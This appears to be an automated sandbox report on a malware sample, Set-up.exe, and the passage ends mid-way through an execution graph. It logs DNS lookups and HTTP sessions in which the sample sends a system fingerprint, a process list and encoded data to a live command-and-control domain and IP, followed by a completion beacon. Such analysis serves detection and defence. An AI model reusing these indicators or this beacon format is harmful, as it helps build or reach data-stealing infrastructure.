                          Dec 30, 2024 18:12:00.769381046 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.769388914 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.769395113 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.769443989 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.769455910 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.769464016 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.769501925 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.769510984 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773401976 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773411036 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773468971 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773478031 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773504972 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773514032 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773524046 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773533106 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773605108 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773612976 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773618937 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773622990 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773703098 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773744106 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773751974 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773760080 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773776054 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773783922 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773834944 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773843050 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773861885 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773869991 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773912907 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773921013 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773937941 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773946047 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.773994923 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.774003029 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.774010897 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:00.818835974 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:04.339529991 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:04.339549065 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:04.339561939 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:04.339644909 CET4973180192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:04.339646101 CET4973180192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:04.341702938 CET4973180192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:04.352471113 CET8049731194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:04.482578039 CET4973253192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:04.487359047 CET53497321.1.1.1192.168.2.4
                          Dec 30, 2024 18:12:04.491729021 CET4973253192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:04.525871992 CET4973253192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:04.729617119 CET53497321.1.1.1192.168.2.4
                          Dec 30, 2024 18:12:05.481374025 CET53497321.1.1.1192.168.2.4
                          Dec 30, 2024 18:12:05.481807947 CET4973253192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:05.481987000 CET4973380192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:05.486764908 CET8049733194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:05.486932039 CET53497321.1.1.1192.168.2.4
                          Dec 30, 2024 18:12:05.496841908 CET4973380192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:05.496843100 CET4973253192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:05.497298956 CET4973380192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:05.502065897 CET8049733194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:06.280271053 CET8049733194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:06.280328989 CET8049733194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:06.280381918 CET4973380192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:06.280601978 CET4973380192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:06.285330057 CET8049733194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:07.189352989 CET4973480192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:07.194209099 CET8049734194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:07.194370031 CET4973480192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:07.194700956 CET4973480192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:07.199474096 CET8049734194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:08.028862000 CET8049734194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:08.028990030 CET8049734194.87.58.155192.168.2.4
                          Dec 30, 2024 18:12:08.029150963 CET4973480192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:08.029191017 CET4973480192.168.2.4194.87.58.155
                          Dec 30, 2024 18:12:08.033961058 CET8049734194.87.58.155192.168.2.4
                          TimestampSource PortDest PortSource IPDest IP
                          Dec 30, 2024 18:11:56.779850006 CET5073353192.168.2.41.1.1.1
                          Dec 30, 2024 18:11:56.779902935 CET5073353192.168.2.41.1.1.1
                          Dec 30, 2024 18:11:56.786699057 CET53507331.1.1.1192.168.2.4
                          Dec 30, 2024 18:11:56.786880970 CET53507331.1.1.1192.168.2.4
                          Dec 30, 2024 18:11:59.780486107 CET5073653192.168.2.41.1.1.1
                          Dec 30, 2024 18:11:59.780632973 CET5073653192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:00.288121939 CET53507361.1.1.1192.168.2.4
                          Dec 30, 2024 18:12:00.288213015 CET53507361.1.1.1192.168.2.4
                          Dec 30, 2024 18:12:04.470122099 CET5073853192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:04.470182896 CET5073853192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:04.477685928 CET53507381.1.1.1192.168.2.4
                          Dec 30, 2024 18:12:04.478246927 CET53507381.1.1.1192.168.2.4
                          Dec 30, 2024 18:12:06.292031050 CET5074053192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:06.292103052 CET5074053192.168.2.41.1.1.1
                          Dec 30, 2024 18:12:07.074273109 CET53507401.1.1.1192.168.2.4
                          Dec 30, 2024 18:12:07.188497066 CET53507401.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Dec 30, 2024 18:11:56.779850006 CET192.168.2.41.1.1.10x6c04Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                          Dec 30, 2024 18:11:56.779902935 CET192.168.2.41.1.1.10x74bbStandard query (0)httpbin.org28IN (0x0001)false
                          Dec 30, 2024 18:11:59.780486107 CET192.168.2.41.1.1.10x368Standard query (0)home.eleventh11vs.topA (IP address)IN (0x0001)false
                          Dec 30, 2024 18:11:59.780632973 CET192.168.2.41.1.1.10x1654Standard query (0)home.eleventh11vs.top28IN (0x0001)false
                          Dec 30, 2024 18:12:04.470122099 CET192.168.2.41.1.1.10x439bStandard query (0)home.eleventh11vs.topA (IP address)IN (0x0001)false
                          Dec 30, 2024 18:12:04.470182896 CET192.168.2.41.1.1.10x4150Standard query (0)home.eleventh11vs.top28IN (0x0001)false
                          Dec 30, 2024 18:12:04.525871992 CET192.168.2.41.1.1.10x439bStandard query (0)home.eleventh11vs.topA (IP address)IN (0x0001)false
                          Dec 30, 2024 18:12:06.292031050 CET192.168.2.41.1.1.10x29Standard query (0)home.eleventh11vs.topA (IP address)IN (0x0001)false
                          Dec 30, 2024 18:12:06.292103052 CET192.168.2.41.1.1.10xafbfStandard query (0)home.eleventh11vs.top28IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Dec 30, 2024 18:11:56.786880970 CET1.1.1.1192.168.2.40x6c04No error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                          Dec 30, 2024 18:11:56.786880970 CET1.1.1.1192.168.2.40x6c04No error (0)httpbin.org52.202.253.164A (IP address)IN (0x0001)false
                          Dec 30, 2024 18:12:00.288121939 CET1.1.1.1192.168.2.40x368No error (0)home.eleventh11vs.top194.87.58.155A (IP address)IN (0x0001)false
                          Dec 30, 2024 18:12:05.481374025 CET1.1.1.1192.168.2.40x439bNo error (0)home.eleventh11vs.top194.87.58.155A (IP address)IN (0x0001)false
                          Dec 30, 2024 18:12:07.074273109 CET1.1.1.1192.168.2.40x29No error (0)home.eleventh11vs.top194.87.58.155A (IP address)IN (0x0001)false
                          • httpbin.org
                          • home.eleventh11vs.top
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449731194.87.58.155806700C:\Users\user\Desktop\Set-up.exe
                          TimestampBytes transferredDirectionData
                          Dec 30, 2024 18:12:00.295105934 CET12360OUTPOST /MTLObSmOhYIfQKgEYuXW1735556847 HTTP/1.1
                          Host: home.eleventh11vs.top
                          Accept: */*
                          Content-Type: application/json
                          Content-Length: 560083
                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 30 37 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317407325", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                          Dec 30, 2024 18:12:00.300040960 CET9888OUTData Raw: 5c 2f 41 47 76 44 39 6e 58 39 4d 61 70 54 6a 56 70 2b 44 38 5a 30 35 4b 36 6c 48 78 44 38 4b 35 4a 5c 2f 64 78 78 64 4e 62 4e 4e 4a 78 64 30 30 6d 6a 38 68 36 4b 5c 2f 5a 6d 32 5c 2f 34 4a 4b 43 34 5c 2f 35 75 42 32 66 39 30 70 33 66 2b 39 4a 58
                          Data Ascii: \/AGvD9nX9MapTjVp+D8Z05K6lHxD8K5J\/dxxdNbNNJxd00mj8h6K\/Zm2\/4JKC4\/5uB2f90p3f+9JX\/OPWvyi+JHhA\/D34h+PfALagNWPgfxp4p8IHVRamxGpnw1rl9op1AWRuLs2YvTZfaRam7uvs\/meV9om2eY37R4K\/Su8AfpEZlnWT+DvHv+uGY8O4HD5nnGG\/1X404f8AqeBxWIeFoV\/a8UcO5JQxHPXTp+z
                          Dec 30, 2024 18:12:00.300126076 CET4944OUTData Raw: 4e 4e 34 43 6c 31 43 33 57 57 34 6c 67 54 53 31 46 67 4c 4c 55 62 33 52 64 56 31 44 55 34 62 66 77 5a 2b 4e 34 37 67 44 41 59 6e 4b 4d 71 78 57 64 63 41 63 4d 65 47 66 44 75 66 7a 79 32 4f 58 38 5a 79 34 74 34 6d 34 67 7a 66 4a 50 37 52 77 6b 73
                          Data Ascii: NN4Cl1C3WW4lgTS1FgLLUb3RdV1DU4bfwZ+N47gDAYnKMqxWdcAcMeGfDufzy2OX8Zy4t4m4gzfJP7Rwks1yr\/WPIqOb5yp18+yrDYh5bRqcP8ADNDEVZwqSxWBprlP6PwPH+Pw+b5phck8QOJ\/EziLII5jLMODFwjwzw\/k+d\/2dioZTmz4cz2tlOTSp4fIc0xGHWZVqfEHEtfD0oTgsJjpyclyP\/BWb4Jz+EP2ctI8aa3
                          Dec 30, 2024 18:12:00.300220966 CET7416OUTData Raw: 46 35 73 55 66 6d 5c 2f 76 38 41 37 4f 50 62 67 66 38 41 31 5c 2f 30 44 74 6a 33 6f 5c 2f 77 44 7a 79 38 72 2b 75 50 38 41 50 4e 48 7a 6e 37 69 53 66 36 33 7a 62 58 30 5c 2f 4c 50 38 41 6e 74 51 42 57 38 74 57 5c 2f 67 32 6f 38 76 37 72 5c 2f 70
                          Data Ascii: F5sUfm\/v8A7OPbgf8A1\/0Dtj3o\/wDzy8r+uP8APNHzn7iSf63zbX0\/LP8AntQBW8tW\/g2o8v7r\/pt\/n3p8n7zY7pG\/l\/uv9b\/y7\/8ALpjvU3kptR3G9Jf+Wfm\/uP8Ar6\/+v3\/Wq3ySfu9nzxn91+6\/z\/n9Z9r5y\/r5nQMX+Pf8iSf609+vH8+fqKEkfCeS+\/8AeiLzOkH+en+eaftf5P8AV\/63\/Pf\/
                          Dec 30, 2024 18:12:00.304600000 CET2472OUTData Raw: 69 5c 2f 75 44 31 37 66 30 48 2b 50 72 7a 56 61 52 58 52 6a 5c 2f 48 2b 76 2b 54 36 48 72 36 31 66 6b 5c 2f 33 50 35 5c 2f 38 41 36 5c 2f 58 30 41 70 6e 38 50 33 49 5c 2f 38 38 5c 2f 54 38 4d 5a 39 75 39 42 76 37 54 79 5c 2f 48 5c 2f 67 46 44 35
                          Data Ascii: i\/uD17f0H+PrzVaRXRj\/H+v+T6Hr61fk\/3P5\/8A6\/X0Apn8P3I\/88\/T8MZ9u9Bv7Ty\/H\/gFD5\/+WnTv\/T39KYG+V8f9df8APfpk1Zkj+5\/nr\/Un36VWSPEe9\/n5\/wA\/\/WoOin1+X6kPmdf4\/wBM+1MVY2ZJH\/z\/AKN\/9aptv8D4\/nx\/9bP5fjUP+3\/yz\/8Ar\/n04+vHWg7CH7y\/P6dI+f8AP
                          Dec 30, 2024 18:12:00.305003881 CET7416OUTData Raw: 78 5c 2f 6e 38 7a 54 31 5c 2f 33 4a 50 66 7a 50 33 48 2b 65 44 37 63 30 66 4c 49 30 7a 75 6d 39 5c 2f 4e 5c 2f 64 66 35 37 66 35 34 46 5a 6e 51 4d 38 74 31 38 37 2b 5c 2f 48 5c 2f 77 42 4d 76 31 5c 2f 72 52 49 30 79 79 4a 44 5c 2f 41 41 66 38 5c
                          Data Ascii: x\/n8zT1\/3JPfzP3H+eD7c0fLI0zum9\/N\/df57f54FZnQM8t187+\/H\/wBMv1\/rRI0yyJD\/AAf8\/H9cChI92\/Y5f\/tr7frnNN2\/MjpDgf6qXzP8\/lWntPL8f+ABDH+8k8vZHMkf2iXzT+487v8A45p8mf3e\/wC5\/n\/Rbupdyfc2DHm\/8u8Xkf5zUMcj4\/uJH\/qv311\/4C\/rk0fH5W+e\/wB3Y0p9fl+o
                          Dec 30, 2024 18:12:00.305133104 CET7416OUTData Raw: 34 5c 2f 68 7a 38 58 66 67 6a 38 59 4e 45 38 64 5c 2f 74 47 2b 44 50 32 55 72 6a 78 56 38 50 76 45 50 78 49 73 39 4c 38 41 5c 2f 47 5c 2f 34 68 58 55 30 48 67 76 77 31 38 51 64 41 2b 4a 5c 2f 77 6b 2b 47 76 78 47 30 33 53 76 45 6b 56 6c 72 6c 35
                          Data Ascii: 4\/hz8Xfgj8YNE8d\/tG+DP2UrjxV8PvEPxIs9L8A\/G\/4hXU0Hgvw18QdA+J\/wk+GvxG03SvEkVlrl5ovjHw\/4F8T+ENVj8M+JNP03W7vXtIn0Y+Z+D\/FumeNdFGu6PIktkbu6sg8UvnRNLaOI5Gjl8uIvGzHKFo0YqQWVScD9N4Z8RuCOMa7wvDPEeAzfFRwyxk8LQdaGKpYWSozp1q2HxFKjWowq0sThcRR9rCDr4TFY
                          Dec 30, 2024 18:12:00.351046085 CET34608OUTData Raw: 47 50 6a 6e 34 55 66 46 4c 77 76 5c 2f 41 4d 45 33 76 32 6e 50 67 70 38 4d 62 4e 5c 2f 44 48 6a 53 62 78 48 34 44 2b 4d 50 6a 6a 5c 2f 67 70 73 6e 78 79 2b 47 6e 68 32 33 38 62 32 58 68 32 36 73 37 4c 78 64 59 66 73 35 72 63 65 4a 39 4e 2b 4a 47
                          Data Ascii: GPjn4UfFLwv\/AME3v2nPgp8MbN\/DHjSbxH4D+MPjj\/gpsnxy+Gnh238b2Xh26s7LxdYfs5rceJ9N+JGkeIE07w3rtnALTxdpXxDg062T76uND0S7kWa60fSrmZcbZbjT7SaRcYxteSFmGMDGDxgelRHw54eLiQ6DopkUYVzpdiXA54DeRkDk8A9z6muLin6GuVcS8TZ3xJHjfO8tq57nGNzXFUMJSoxt9e4bxPC06CrLlqzh
                          Dec 30, 2024 18:12:00.399055004 CET1236OUTData Raw: 78 58 31 6a 5c 2f 77 42 49 4c 69 76 58 4b 39 6c 2b 43 50 37 4a 47 6f 66 74 74 2b 49 5c 2f 45 50 77 43 30 76 78 78 59 5c 2f 44 79 5c 2f 77 44 45 48 67 62 78 4c 71 45 48 69 58 55 64 43 75 50 45 4e 6e 62 69 78 6a 74 6f 4a 59 70 64 4f 74 64 53 30 71
                          Data Ascii: xX1j\/wBILivXK9l+CP7JGoftt+I\/EPwC0vxxY\/Dy\/wDEHgbxLqEHiXUdCuPENnbixjtoJYpdOtdS0qdt0F7JOjpcnMlusDIqzGeH8k8Xsxw+XeFniJisZUVGguDeIaDqclSp+9xeWYnCYePLSjOf7zEV6VO\/Lyx5uabjCMpL\/PP6N2DxOO+kD4KUsLT9rUo+KPA+PqR54Q5cJlfEWX5nj6t6koRfsMFhMRX5It1Kvs\/Z
                          Dec 30, 2024 18:12:00.447066069 CET1236OUTData Raw: 55 4d 54 48 48 78 6a 69 7a 39 49 66 2b 43 71 47 76 5c 2f 73 4b 65 4b 66 32 70 70 76 45 48 5c 2f 42 50 57 43 33 74 76 67 6a 71 6e 67 44 77 7a 50 72 31 76 70 66 68 58 78 6c 34 4b 38 4d 78 66 45 30 58 2b 76 78 65 49 78 34 54 38 4e 65 4f 72 62 54 39
                          Data Ascii: UMTHHxjiz9If+CqGv\/sKeKf2ppvEH\/BPWC3tvgjqngDwzPr1vpfhXxl4K8MxfE0X+vxeIx4T8NeOrbT9c0zQ5NEj8LzNbjSdI06PWJNXj06xNsi3l3F+xD\/yAPFv\/AGGD\/wCkWl1+cdfpD+xDC48PeK3ZGVZdVZo2IIDgWunR5U9CA8cin3U+lf2L+zoxNXNPpY5ZmCwmHw3tuG+L8VWoYChKjg8NGpgqUX7OlzVPY0faV
                          Dec 30, 2024 18:12:00.496628046 CET1236OUTData Raw: 46 62 7a 37 62 63 53 49 4e 43 38 66 2b 42 6f 30 30 33 2b 79 66 45 50 6b 52 76 63 61 66 5a 36 79 62 48 53 37 32 35 55 57 38 74 78 48 34 62 38 51 32 39 30 49 4c 6a 7a 56 6a 6b 5c 2f 4d 6a 34 65 66 73 65 5c 2f 74 71 5c 2f 46 54 55 76 32 53 5c 2f 67
                          Data Ascii: Fbz7bcSINC8f+Bo003+yfEPkRvcafZ6ybHS725UW8txH4b8Q290ILjzVjk\/Mj4efse\/tq\/FTUv2S\/gB4y\/ZP8H\/A3w1+zH4+h1\/xV8e4ItFttU8TaTZ6\/a6vdzPq2nandHxJqF3HaEW8OiyalHq2uSWOpXtxotjBcyw\/qv8AE\/8AY9\/aE+B3xi8YftG\/8E\/vFvg3Rr34k3i6v8ZP2bviUt7H8MPiDrpmuLi68U
                          Dec 30, 2024 18:12:04.339529991 CET157INHTTP/1.1 200 OK
                          Server: nginx/1.22.1
                          Date: Mon, 30 Dec 2024 17:12:04 GMT
                          Content-Type: text/html; charset=utf-8
                          Content-Length: 1
                          Connection: close
                          Data Raw: 30
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449733194.87.58.155806700C:\Users\user\Desktop\Set-up.exe
                          TimestampBytes transferredDirectionData
                          Dec 30, 2024 18:12:05.497298956 CET101OUTGET /MTLObSmOhYIfQKgEYuXW1735556847?argument=0 HTTP/1.1
                          Host: home.eleventh11vs.top
                          Accept: */*
                          Dec 30, 2024 18:12:06.280271053 CET372INHTTP/1.1 404 NOT FOUND
                          Server: nginx/1.22.1
                          Date: Mon, 30 Dec 2024 17:12:06 GMT
                          Content-Type: text/html; charset=utf-8
                          Content-Length: 207
                          Connection: close
                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.449734194.87.58.155806700C:\Users\user\Desktop\Set-up.exe
                          TimestampBytes transferredDirectionData
                          Dec 30, 2024 18:12:07.194700956 CET174OUTPOST /MTLObSmOhYIfQKgEYuXW1735556847 HTTP/1.1
                          Host: home.eleventh11vs.top
                          Accept: */*
                          Content-Type: application/json
                          Content-Length: 31
                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                          Data Ascii: { "id1": "0", "data": "Done1" }
                          Dec 30, 2024 18:12:08.028862000 CET372INHTTP/1.1 404 NOT FOUND
                          Server: nginx/1.22.1
                          Date: Mon, 30 Dec 2024 17:12:07 GMT
                          Content-Type: text/html; charset=utf-8
                          Content-Length: 207
                          Connection: close
                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44973034.197.122.1724436700C:\Users\user\Desktop\Set-up.exe
                          TimestampBytes transferredDirectionData
                          2024-12-30 17:11:57 UTC52OUTGET /ip HTTP/1.1
                          Host: httpbin.org
                          Accept: */*
                          2024-12-30 17:11:58 UTC224INHTTP/1.1 200 OK
                          Date: Mon, 30 Dec 2024 17:11:58 GMT
                          Content-Type: application/json
                          Content-Length: 31
                          Connection: close
                          Server: gunicorn/19.9.0
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Credentials: true
                          2024-12-30 17:11:58 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                          Data Ascii: { "origin": "8.46.123.189"}


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Target ID:0
                          Start time:12:11:55
                          Start date:30/12/2024
                          Path:C:\Users\user\Desktop\Set-up.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Set-up.exe"
                          Imagebase:0x800000
                          File size:6'759'048 bytes
                          MD5 hash:F54B04DCDDB77FDC57B307E8EC7DAEA1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:1.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:29.8%
                            Total number of Nodes:1520
                            Total number of Limit Nodes:78
                            execution_graph 91499 90bc90 125 API calls 91646 a012a0 22 API calls 89880 839480 89893 807770 89880->89893 89883 8394df WSAGetLastError 89884 8394fb 89883->89884 89889 8394c9 89883->89889 89907 81d090 66 API calls 89884->89907 89885 8394da 89886 839589 89885->89886 89910 81d8c0 89885->89910 89888 83950f 89908 844f40 52 API calls 89888->89908 89889->89885 89909 8450a0 51 API calls 89889->89909 89894 807790 89893->89894 89895 8077b6 recv 89893->89895 89894->89895 89896 807799 89894->89896 89897 8077c4 89895->89897 89898 80782e 89895->89898 89899 8077a3 recv 89896->89899 89900 8077db 89896->89900 89914 8072a0 50 API calls 89897->89914 89898->89883 89898->89889 89899->89897 89915 8072a0 50 API calls 89900->89915 89903 8077d4 89903->89898 89904 8077ec __acrt_iob_func 89916 80cb20 78 API calls 89904->89916 89906 80780c fflush _errno 89906->89898 89907->89888 89908->89889 89909->89885 89911 81d968 GetTickCount 89910->89911 89912 81d8dd QueryPerformanceCounter 89910->89912 89913 81d913 89911->89913 89912->89913 89913->89886 89914->89903 89915->89904 89916->89906 91647 b51ab0 20 API calls 91648 803686 122 API calls 89957 c974c0 calloc 89958 c974e5 calloc 89957->89958 89960 c97500 89957->89960 89959 c9755c free 89958->89959 89958->89960 89959->89960 91650 8a7280 _assert 91502 9f6490 42 API calls 91503 a2acb0 36 API calls 90266 839290 90283 8076a0 90266->90283 90269 8393c3 WSAGetLastError 90271 8393e5 90269->90271 90278 839392 90269->90278 90270 8392f3 90272 81d8c0 2 API calls 90270->90272 90270->90278 90297 81d090 66 API calls 90271->90297 90276 83930b 90272->90276 90274 8393f7 90298 844f40 52 API calls 90274->90298 90276->90278 90279 839335 WSAIoctl 90276->90279 90281 8393be 90278->90281 90299 8450a0 51 API calls 90278->90299 90279->90278 90280 839366 90279->90280 90280->90278 90282 839371 setsockopt 90280->90282 90282->90278 90284 8076c0 90283->90284 90285 8076e6 send 90283->90285 90284->90285 90286 8076c9 90284->90286 90287 8076f4 90285->90287 90288 